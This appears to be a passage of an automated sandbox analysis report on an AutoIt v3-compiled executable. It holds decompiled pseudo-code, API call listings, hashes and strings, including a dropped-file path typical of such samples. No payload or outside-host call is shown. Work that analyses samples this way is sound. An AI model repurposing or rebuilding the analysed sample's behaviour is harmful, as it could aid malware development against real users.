                									if(_t380 != _t462) {
                										CloseHandle(_t380);
                										_t533[0x115] = _t462;
                									}
                									_t511 =  *_t533;
                									_t471 = _t533 + _t511->message;
                									_v324 = _t462;
                									E003FD620( &_v324, _t533 + _t511->message);
                									goto L66;
                								}
                								__eflags = _t379 - _t533[0x112];
                								if(_t379 < _t533[0x112]) {
                									goto L127;
                								}
                								goto L123;
                							} else {
                								if(_t358 == 2 || _t358 == 3 || _t358 == 4 || _t358 == 5 || _t358 == 6) {
                									Sleep(0xa); // executed
                									__eflags = _t533[0xbc];
                									if(_t533[0xbc] == 0) {
                										L56:
                										_t384 = _t533[0x3e];
                										__eflags = _t384 - 3;
                										if(_t384 < 3) {
                											goto L29;
                										}
                										_t385 = _t384 - 3;
                										__eflags = _t385 - 3;
                										if(__eflags > 0) {
                											goto L29;
                										} else {
                											switch( *((intOrPtr*)(_t385 * 4 +  &M0041E113))) {
                												case 0:
                													__eax = E0045F356(__ecx, __fp0, __edi, 1);
                													goto L149;
                												case 1:
                													__eax = E0045F356(__ecx, __fp0, __edi, 1);
                													__esi = __eax;
                													__eflags = __esi;
                													if(__eflags < 0) {
                														goto L150;
                													}
                													if(__eflags <= 0) {
                														goto L153;
                													}
                													goto L29;
                												case 2:
                													_t386 = E0045FD79(__eflags, _t606, _t533);
                													L149:
                													_t547 = _t386;
                													__eflags = _t547;
                													if(__eflags >= 0) {
                														goto L151;
                													}
                													goto L150;
                												case 3:
                													__eax = E0045FD79(__eflags, __fp0, __edi);
                													__esi = __eax;
                													__eflags = __esi;
                													if(__eflags < 0) {
                														L150:
                														_t511 =  ~_t547;
                														E003F3EC0(_t533 +  *_t533->message, _t511, 0);
                														_t471 = _t533 +  *_t533->message;
                														_v332 = 0;
                														E003FD620( &_v332, _t533 +  *_t533->message);
                														__eflags = _t547;
                														L151:
                														if(__eflags == 0) {
                															goto L29;
                														}
                														__eflags = _t547;
                														if(_t547 <= 0) {
                															L156:
                															_push(_t533[0xbd]);
                															_t533[0x51] = 1;
                															_t533[0x3e] = 0;
                															E00423187(_t533[0xbd], _t606);
                															_t572 =  &(_t572[1]);
                															goto L29;
                														}
                														L153:
                														_t389 = _t533[0x3e];
                														__eflags = _t389 - 5;
                														if(_t389 == 5) {
                															L155:
                															_v188.hwnd = 0;
                															_v188.wParam = 1;
                															_v188.lParam = 0;
                															E003F9190(_t533,  &_v188);
                															_t471 =  *_t533;
                															_t511 = _t533 +  *_t533->message;
                															__eflags = _t511;
                															_v188.wParam = 7;
                															_v188 =  *(_t533[0x76]);
                															E0046319B( *_t533, _t511,  &_v188, 0);
                															E003F9190(_t533,  &_v188);
                															goto L156;
                														}
                														__eflags = _t389 - 3;
                														if(_t389 != 3) {
                															goto L156;
                														}
                														goto L155;
                													}
                													if(__eflags > 0) {
                														goto L29;
                													}
                													goto L153;
                											}
                										}
                										while(1) {
                											L58:
                											__eflags = _v244.message - 0x12;
                											if(_v244.message == 0x12) {
                												break;
                											}
                											_t471 = 0x498630;
                											_t336 = E003FD3E0(0x498630,  &_v244);
                											__eflags = _t336;
                											if(_t336 == 0) {
                												_t338 = E003FD400(0x498630,  &_v244);
                												__eflags = _t338;
                												if(_t338 == 0) {
                													TranslateMessage( &_v244);
                													_t471 =  &_v244;
                													DispatchMessageW( &_v244); // executed
                												}
                											}
                											_t511 =  &_v244;
                											_t337 = PeekMessageW(_t511, 0, 0, 0, 1);
                											__eflags = _t337;
                											if(_t337 == 0) {
                												L8:
                												if( *0x4874e6 == 1) {
                													 *0x4874ec = 0;
                													 *0x4874e6 = 0;
                													_t533[0x3e] = 1;
                												}
                												if(_t533[0x3e] == 1) {
                													_t471 = _t533 +  *_t533->message;
                													_v304 = 0;
                													E003FD620( &_v304, _t533 +  *_t533->message);
                													goto L30;
                												} else {
                													goto L10;
                												}
                											} else {
                												continue;
                											}
                										}
                										_t533[0x3f] = 1;
                										_t533[0x3e] = 1;
                										goto L8;
                									}
                									_t400 = E003FC870(_t533[0xbe]);
                									_t471 = 0;
                									__eflags = _t511;
                									if(__eflags < 0) {
                										goto L56;
                									}
                									_t462 = 0;
                									if(__eflags > 0) {
                										L65:
                										__eflags = _t533[0x3e] - 2;
                										if(_t533[0x3e] != 2) {
                											_t471 = _t533 +  *_t533->message;
                											_v324 = _t462;
                											E003FD620( &_v324, _t533 +  *_t533->message);
                										}
                										L66:
                										_t533[0x51] = 1;
                										_t533[0x3e] = _t462;
                										goto L29;
                									}
                									__eflags = _t400 - _t533[0xbc];
                									if(_t400 >= _t533[0xbc]) {
                										goto L65;
                									}
                									goto L56;
                								} else {
                									_t480 = _a4;
                									_t533[0x3d] = _t480;
                									_t403 = _t480;
                									_t471 = _t480 + 1;
                									_a4 = _t480 + 1;
                									_t598 = _t403 -  *0x4990f8; // 0x0
                									if(_t598 > 0 || _t403 <= 0) {
                										L160:
                										_t533[0x3e] = 1;
                										goto L29;
                									} else {
                										_t405 = (_t403 << 4) +  *0x49912c;
                										if(_t405 == 0) {
                											goto L160;
                										}
                										_t549 = _t405;
                										_t471 =  *(_t549 + 4);
                										_v328 = 0;
                										_t511 =  *( *(_t549 + 4));
                										_t406 = _t511->wParam;
                										if(_t406 != 0) {
                											__eflags = _t406 - 0x34;
                											if(__eflags != 0) {
                												_t407 = _t406 - 1;
                												__eflags = _t407 - 0x7e;
                												if(_t407 > 0x7e) {
                													L166:
                													_t511 = _t511->wParam;
                													E0044E724(_t606, _t533, 0x1388, _t511);
                													goto L29;
                												}
                												switch( *((intOrPtr*)(( *(_t407 + 0x3f9864) & 0x000000ff) * 4 +  &M003F9850))) {
                													case 0:
                														__eax = 0;
                														__ecx =  &_v164;
                														_v164 = 0;
                														_v152 = 0;
                														__eax =  &_v328;
                														__edx = __esi;
                														__ebx = __edi;
                														_v156 = 1;
                														__eax = E003F8F10( &_v328, __ebx, __esi,  &_v164); // executed
                														__eflags = __eax;
                														if(__eax == 0) {
                															__edx =  *(__esi + 4);
                															__eax = _v328;
                															__eax =  *( *(__esi + 4) + _v328 * 4);
                															__eflags =  *((short*)(__eax + 8)) - 0x7f;
                															if( *((short*)(__eax + 8)) != 0x7f) {
                																__ecx =  *((short*)(__eax + 0xa));
                																__eax = E0044E724(__fp0, __edi, 0x72,  *((short*)(__eax + 0xa)));
                															}
                														}
                														__esi =  &_v164;
                														__eax = E003F9190(__edi, __esi);
                														goto L29;
                													case 1:
                														E003F9210(_t549, _t606, _t533); // executed
                														goto L29;
                													case 2:
                														__ebx = __edi + 0x488;
                														__eax = E004223E7(__ebx);
                														__eflags = __al;
                														if(__al != 0) {
                															__eax =  &_v328;
                															__eax = E0046FA6A(__fp0, __edi, __esi,  &_v328, __ebx);
                															__eflags = __eax;
                															if(__eax != 0) {
                																__ecx =  *(__esi + 4);
                																__edx = _v328;
                																__eax =  *( *(__esi + 4) + _v328 * 4);
                																__ecx =  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa));
                																__eax = E0044E724(__fp0, __edi, 0xaa,  *((short*)( *( *(__esi + 4) + _v328 * 4) + 0xa)));
                															}
                														} else {
                															__edx =  *((short*)(__edx + 0xa));
                															__eax = E0044E724(__fp0, __edi, 0xa7, __edx);
                														}
                														goto L29;
                													case 3:
                														goto L29;
                													case 4:
                														goto L166;
                												}
                											}
                											_t471 =  &_v276;
                											_v276 = 0;
                											_v268 = 1;
                											_v264 = 0;
                											_t414 = E003F98F0( &_v328, __eflags, _t606, _t533, _t549,  &_v276,  &_v277); // executed
                											__eflags = _t414;
                											if(_t414 != 0) {
                												L37:
                												_t564 = _v264;
                												__eflags = _t564;
                												if(_t564 != 0) {
                													 *( *(_t564 + 0xc)) =  *( *(_t564 + 0xc)) - 1;
                													_t511 =  *(_t564 + 0xc);
                													__eflags = _t511->hwnd;
                													if(_t511->hwnd == 0) {
                														_push(_t564->i);
                														E004010FC();
                														_t471 =  *(_t564 + 0xc);
                														_push( *(_t564 + 0xc));
                														E004010FC();
                														_t572 =  &(_t572[2]);
                													}
                													_push(_t564);
                													E004010FC();
                													_t572 =  &(_t572[1]);
                													_v264 = 0;
                												}
                												_t415 = _v268;
                												__eflags = _t415 - 8;
                												if(_t415 == 8) {
                													_t565 = _v276;
                													__eflags = _t565;
                													if(_t565 != 0) {
                														__imp__#9(_t565);
                														_push(_t565);
                														E004010FC();
                														_t572 =  &(_t572[1]);
                													}
                												} else {
                													__eflags = _t415 - 0xa;
                													if(_t415 == 0xa) {
                														_t417 = _v276;
                														__eflags = _t417;
                														if(_t417 != 0) {
                															E004330B0(_t417);
                														}
                													} else {
                														__eflags = _t415 - 5;
                														if(_t415 == 5) {
                															E003FE470( &_v276, _t564);
                														} else {
                															__eflags = _t415 - 0xb;
                															if(_t415 == 0xb) {
                																_t566 = _v276;
                																_t511 =  *(_t566 + 4);
                																_push(_t511);
                																E004010FC();
                																_push(_t566);
                																E004010FC();
                																_t572 =  &(_t572[2]);
                															} else {
                																__eflags = _t415 - 0xc;
                																if(_t415 == 0xc) {
                																	_t423 = _v276;
                																	__eflags = _t423;
                																	if(_t423 != 0) {
                																		E0043B350(_t423);
                																	}
                																}
                															}
                														}
                													}
                												}
                												goto L29;
                											}
                											_t511 =  *(_t549 + 4);
                											_t431 =  *((intOrPtr*)(_t511 + _v328 * 4));
                											__eflags =  *((short*)(_t431 + 8)) - 0x7f;
                											if( *((short*)(_t431 + 8)) != 0x7f) {
                												_t471 =  *((short*)(_t431 + 0xa));
                												E0044E724(_t606, _t533, 0x72,  *((short*)(_t431 + 0xa)));
                												E003F9190(_t533,  &_v288);
                												goto L29;
                											}
                											goto L37;
                										} else {
                											E003FB1F0(_t606, _t533, _t549,  &_a4); // executed
                											goto L29;
                										}
                									}
                								}
                							}
                						}
                						if( *0x498668 != 0) {
                							__eflags = _t533[0x3e];
                							if(_t533[0x3e] == 0) {
                								goto L10;
                							}
                						}
                						if(PeekMessageW( &_v244, 0, 0, 0, 1) != 0) {
                							goto L58;
                						}
                						goto L8;
                					}
                					goto L30;
                				}
                			}
                0x0041e0a2
                0x003f9692
                0x003f9692
                0x003f9695
                0x0041e0aa
                0x0041e0ae
                0x0041e0b0
                0x0041e0b7
                0x0041e0b7
                0x0041e0b0
                0x003f9695
                0x003f968c
                0x003f9683
                0x003f967a
                0x00000000
                0x003f9671
                0x003f9630
                0x003f9637
                0x003f963a
                0x003f963f
                0x0041e00f
                0x0041e017
                0x0041e020
                0x00000000
                0x0041e020
                0x00000000
                0x003f95be
                0x003f95c4
                0x00000000
                0x003f95c4
                0x003f95bc
                0x003f958c
                0x003f954d
                0x003f953b
                0x003f949d
                0x0041d751
                0x0041d758
                0x00000000
                0x00000000
                0x0041d75e
                0x003f94ba
                0x00000000
                0x00000000
                0x00000000
                0x003f94ba
                0x00000000
                0x003f9480

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp
                Similarity
                • API ID: Message$Peek$DispatchSleepTranslate
                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                • API String ID: 1762048999-758534266
                • Opcode ID: 57c53dcf5b94ba3d8129dd36a77d28a374bb531e7a43e4e35821d8a180938a2e
                • Instruction ID: 440118ae44683f53f526efca64fa140b0b7227e5c9352bf6994b9e193797b156
                • Opcode Fuzzy Hash: 57c53dcf5b94ba3d8129dd36a77d28a374bb531e7a43e4e35821d8a180938a2e
                • Instruction Fuzzy Hash: 8E62E1B06083469FD726DF24C884BBBB7A4BF85304F10492FF65987251D778E889CB96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003FE5FF
                • __wsplitpath.LIBCMT ref: 003FE61C
                  • Part of subcall function 0040392E: __wsplitpath_helper.LIBCMT ref: 00403970
                • _wcsncat.LIBCMT ref: 003FE633
                • __wmakepath.LIBCMT ref: 003FE64F
                  • Part of subcall function 004039BE: __wmakepath_s.LIBCMT ref: 004039D4
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                • _wcscpy.LIBCMT ref: 003FE687
                  • Part of subcall function 003FE6C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,003FE6A1), ref: 003FE6DD
                • _wcscat.LIBCMT ref: 00417324
                • _wcslen.LIBCMT ref: 00417334
                • _wcslen.LIBCMT ref: 00417345
                • _wcscat.LIBCMT ref: 0041735F
                • _wcsncpy.LIBCMT ref: 0041739F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                • String ID: Include$\
                • API String ID: 3173733714-3429789819
                • Opcode ID: 818547af53e7065e3a18a354dce6b34b0cfac52420b0df52dcce3bd969b7180d
                • Instruction ID: 293681fcbc11baee6398d42dea0459430fea0f233df5b2b6a600b3bfc331ecc5
                • Opcode Fuzzy Hash: 818547af53e7065e3a18a354dce6b34b0cfac52420b0df52dcce3bd969b7180d
                • Instruction Fuzzy Hash: 1951D0B14043059BE310EF69DC868AA73E8BB68304F40853FF599972A1E7759A44CB5E
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _malloc
                • String ID: DZG$Default
                • API String ID: 1579825452-3579849055
                • Opcode ID: bb41b5b57e95f697acee15cdcf722bc15477fb9cc109b3d032e6ca4fd10086b7
                • Instruction ID: bb41a8e349b937a021ae2236a39f8acc057393d2619f235fdcb66f05c980733f
                • Opcode Fuzzy Hash: bb41b5b57e95f697acee15cdcf722bc15477fb9cc109b3d032e6ca4fd10086b7
                • Instruction Fuzzy Hash: D472ACB05043099FC715DF28C580A2BB7E5EF88314F15882EEA8A8B761D739EC45CB97
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 004003EB
                • LoadCursorW.USER32(00000000,00007F00), ref: 004003FA
                • LoadIconW.USER32 ref: 00400410
                • LoadIconW.USER32 ref: 00400423
                • LoadIconW.USER32 ref: 00400436
                • LoadImageW.USER32 ref: 0040045E
                • RegisterClassExW.USER32 ref: 004004AD
                  • Part of subcall function 004004E0: GetSysColorBrush.USER32(0000000F), ref: 00400513
                  • Part of subcall function 004004E0: RegisterClassExW.USER32 ref: 0040053D
                  • Part of subcall function 004004E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040054E
                  • Part of subcall function 004004E0: InitCommonControlsEx.COMCTL32(004990E8), ref: 0040056B
                  • Part of subcall function 004004E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0040057B
                  • Part of subcall function 004004E0: LoadIconW.USER32 ref: 00400592
                  • Part of subcall function 004004E0: ImageList_ReplaceIcon.COMCTL32(013213F8,000000FF,00000000), ref: 004005A2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: 5f914dd888a37ceb3f4bcc44099f678cc387f1c9ec0936ea24d14bb95f452054
                • Instruction ID: 6f52d7f147ab47b6d3ad81a8845992c8e1cdcc23e64295f95ec345de912c4a66
                • Opcode Fuzzy Hash: 5f914dd888a37ceb3f4bcc44099f678cc387f1c9ec0936ea24d14bb95f452054
                • Instruction Fuzzy Hash: 3F215EB1D54314ABD710DFA9EC49BAE7BB4BB4C700F10447BE608A7290D7B49940CB98
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00400513
                • RegisterClassExW.USER32 ref: 0040053D
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040054E
                • InitCommonControlsEx.COMCTL32(004990E8), ref: 0040056B
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0040057B
                • LoadIconW.USER32 ref: 00400592
                • ImageList_ReplaceIcon.COMCTL32(013213F8,000000FF,00000000), ref: 004005A2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$TaskbarCreated
                • API String ID: 2914291525-888179712
                • Opcode ID: 7b6f18010de9b02d07ca0c5cdfcf7c4c70437746e70a902e1cbff38b2e50d43a
                • Instruction ID: 1b2e42f79018cbc02bfdc1f9daedc4279e23f06f2e29a1097c08d857e09b8f6d
                • Opcode Fuzzy Hash: 7b6f18010de9b02d07ca0c5cdfcf7c4c70437746e70a902e1cbff38b2e50d43a
                • Instruction Fuzzy Hash: E021C8B5901218AFDB10DFA8ED49BDDBBB4FB08710F10812AF618AA290D7B44584CF99
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DefWindowProcW.USER32(?,?,?,?), ref: 003F1376
                • KillTimer.USER32(?,00000001), ref: 003F13F9
                  • Part of subcall function 003F1240: _memset.LIBCMT ref: 003F126B
                  • Part of subcall function 003F1240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 003F129B
                • PostQuitMessage.USER32(00000000), ref: 003F140B
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow_memset
                • String ID: TaskbarCreated
                • API String ID: 1519149367-2362178303
                • Opcode ID: 16e0c13353de49fcc09752920254b0e20264c63cf595ff04476ed213437d9d14
                • Instruction ID: d12e08f907518e29ebfe93f648163c23f2ce64489d2947586cca8f4ca4f70acd
                • Opcode Fuzzy Hash: 16e0c13353de49fcc09752920254b0e20264c63cf595ff04476ed213437d9d14
                • Instruction Fuzzy Hash: CD41367660820CDBDB21DBA8FC85FBE7758E751320F11453BFA0487991C6B59C80839A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __fread_nolock_fseek_memmove
                • String ID: AU3!$EA06
                • API String ID: 3969463491-2658333250
                • Opcode ID: e31151c158dcbe4c0583fcbb92ad84b1172b62606df60092e62f85a08a29fb54
                • Instruction ID: 684778db8f03d5e0eb52d7cf3404b320ca3cac9db35853dc096237575af4f149
                • Opcode Fuzzy Hash: e31151c158dcbe4c0583fcbb92ad84b1172b62606df60092e62f85a08a29fb54
                • Instruction Fuzzy Hash: D8415E72A0424C9FDB12CF64C880FFD3B64AF5A304F6444BEFB45DB642E67495818B61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00423229: _wcsncpy.LIBCMT ref: 00423241
                • _wcslen.LIBCMT ref: 004235D7
                • GetFileAttributesW.KERNELBASE(?), ref: 00423601
                • GetLastError.KERNEL32 ref: 00423610
                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00423624
                • _wcsrchr.LIBCMT ref: 0042364B
                  • Part of subcall function 004235B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 0042368C
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                • String ID: \
                • API String ID: 321622961-2967466578
                • Opcode ID: 7673dc43ca92eb27a5f92398be8fcbdebd1627fad6e27c4a90866c3ddc0ad003
                • Instruction ID: 4aab2743144dbf57cc999754928ff046b0a922e4d6b7b1354b303d2b04179746
                • Opcode Fuzzy Hash: 7673dc43ca92eb27a5f92398be8fcbdebd1627fad6e27c4a90866c3ddc0ad003
                • Instruction Fuzzy Hash: CD210E71A0132466DB30AF64BC06BEB737CDF01715F4046ABFD18D2241E67D9A948AA9
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _malloc.LIBCMT ref: 00401511
                  • Part of subcall function 004034DB: __FF_MSGBANNER.LIBCMT ref: 004034F4
                  • Part of subcall function 004034DB: __NMSG_WRITE.LIBCMT ref: 004034FB
                  • Part of subcall function 004034DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00406A35,?,00000001,?,?,00408179,00000018,0047D180,0000000C,00408209), ref: 00403520
                • std::exception::exception.LIBCMT ref: 00401546
                • std::exception::exception.LIBCMT ref: 00401560
                • __CxxThrowException@8.LIBCMT ref: 00401571
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                • String ID: ,*G$4*G$@fH
                • API String ID: 615853336-2081664741
                • Opcode ID: eec46f7751f958c493d7c0d5b07cbcd14074226086c2c413a781ed58a75373a9
                • Instruction ID: 25759bdf442917a4c2bd76853d3d1dbf0342a4a4476ca405277daf107041f176
                • Opcode Fuzzy Hash: eec46f7751f958c493d7c0d5b07cbcd14074226086c2c413a781ed58a75373a9
                • Instruction Fuzzy Hash: 80F0F9319001097BCB11FF55DC02A9E36A9EB80308F11847FF805B61E1DBBC9E048B4D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 003F14BC
                  • Part of subcall function 003F1E00: _memset.LIBCMT ref: 003F1E90
                  • Part of subcall function 003F1E00: _wcsncpy.LIBCMT ref: 003F1ED2
                  • Part of subcall function 003F1E00: _wcscpy.LIBCMT ref: 003F1EF1
                  • Part of subcall function 003F1E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 003F1F03
                • KillTimer.USER32(?,?,?,?,?), ref: 003F1513
                • SetTimer.USER32 ref: 003F1522
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00417BC8
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00417C1C
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00417C67
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                • String ID:
                • API String ID: 1792922140-0
                • Opcode ID: 55a3e70303a108b2413f333da568f75175f722da74eb96ceb1b5e44c7a65bd42
                • Instruction ID: ac129a8d5941c5aac00ce4d5d6d5383dcb7de392de1f086eda96855bdab12234
                • Opcode Fuzzy Hash: 55a3e70303a108b2413f333da568f75175f722da74eb96ceb1b5e44c7a65bd42
                • Instruction Fuzzy Hash: 2031A170A0865DFFEB67CB24DC99BE6FBBCFB46304F004195E28D56240C7746A848B96
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetVersionExW.KERNEL32(?), ref: 003FE72A
                  • Part of subcall function 003F2390: _wcslen.LIBCMT ref: 003F239D
                  • Part of subcall function 003F2390: _memmove.LIBCMT ref: 003F23C3
                • GetCurrentProcess.KERNEL32(?), ref: 003FE7D4
                • GetNativeSystemInfo.KERNELBASE(?), ref: 003FE832
                • FreeLibrary.KERNEL32(?), ref: 003FE842
                • FreeLibrary.KERNEL32(?), ref: 003FE854
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                • String ID:
                • API String ID: 3363477735-0
                • Opcode ID: 9e428fb3e0ec5dc39084db86738092cf343aa27a329e3780b881f1a4a16531dc
                • Instruction ID: bba7c42852ffcf4969871284e9584ff5195b8a69aef202b061caba6c17d302ea
                • Opcode Fuzzy Hash: 9e428fb3e0ec5dc39084db86738092cf343aa27a329e3780b881f1a4a16531dc
                • Instruction Fuzzy Hash: DD61D37080868AEECB11DFA4C8446EDFFB4BF09304F14456AD508A7B41C379A998CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SHGetMalloc.SHELL32(003FF1FC), ref: 003FF3BD
                • SHGetDesktopFolder.SHELL32(?,004990E8), ref: 003FF3D2
                • _wcsncpy.LIBCMT ref: 003FF3ED
                • SHGetPathFromIDListW.SHELL32(?,?), ref: 003FF427
                • _wcsncpy.LIBCMT ref: 003FF440
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                • String ID: C:\Users\user\31956653\thjfdg.xcp
                • API String ID: 3170942423-3657453284
                • Opcode ID: caacc7238929fd5a3a737da2130e290da615b983c7f73eae37086701d551b48d
                • Instruction ID: f037a5acacabdbe28416837d39bcfdcffccdf574f0a24977c7b0bcde5f31fc73
                • Opcode Fuzzy Hash: caacc7238929fd5a3a737da2130e290da615b983c7f73eae37086701d551b48d
                • Instruction Fuzzy Hash: E8219475A00219AFCB10DBA4DC84DEFB37DEF88704F108599F909D7250EA74AE41CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,003FE6A1), ref: 003FE6DD
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,003FE6A1,00000000,?,?,?,003FE6A1), ref: 00417117
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,003FE6A1,?,00000000,?,?,?,?,003FE6A1), ref: 0041715E
                • RegCloseKey.ADVAPI32(?,?,?,?,003FE6A1), ref: 0041718F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: QueryValue$CloseOpen
                • String ID: Include$Software\AutoIt v3\AutoIt
                • API String ID: 1586453840-614718249
                • Opcode ID: eae743c07b76f5db882aeaa1b499e6dc460f24c9e73ce70f994d9f3faa321202
                • Instruction ID: e0200c36c6c71a205a6c2b00013c44cf8370abd9e73570caba30d3370bebe3f6
                • Opcode Fuzzy Hash: eae743c07b76f5db882aeaa1b499e6dc460f24c9e73ce70f994d9f3faa321202
                • Instruction Fuzzy Hash: 9D21A571780208BBDB14DBB4DD46FEF737DEF54700F10455AB609E7280EAB5AA418768
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32 ref: 00400385
                • CreateWindowExW.USER32 ref: 004003AE
                • ShowWindow.USER32(?,00000000), ref: 004003C4
                • ShowWindow.USER32(?,00000000), ref: 004003CE
                Strings
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004990E8,14000000,0041E1BD), ref: 00422FDD
                • LockServiceDatabase.ADVAPI32(00000000), ref: 00422FEA
                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00422FF5
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00422FFE
                • GetLastError.KERNEL32 ref: 00423009
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00423019
                Similarity
                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                • String ID:
                • API String ID: 1690418490-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 004006F7
                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040071E
                • RegCloseKey.KERNELBASE(?), ref: 00400745
                • RegCloseKey.ADVAPI32(?), ref: 00400759
                Strings
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 1607946009-824357125
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 00419558
                • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 0041959F
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
